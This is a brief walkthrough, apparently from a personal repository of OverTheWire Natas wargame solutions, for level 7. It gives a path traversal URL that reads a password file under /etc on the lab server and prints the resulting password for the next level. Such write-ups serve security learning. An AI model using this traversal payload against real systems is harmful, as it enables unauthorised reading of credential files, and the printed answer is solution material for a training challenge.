Reda-BELHAJ/OverTheWire/Natas/Natas0-9/Level7.md

 ```
 So we now know that the server is hosted on a unix / linux server we can do something like this:
 http://natas7.natas.labs.overthewire.org/index.php?page=../../../../../../etc/natas_webpass/natas8

+BTW we don't know how many "/.." we need to write so if we add extra "/.." will have no effect.
 ```
 DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
 ```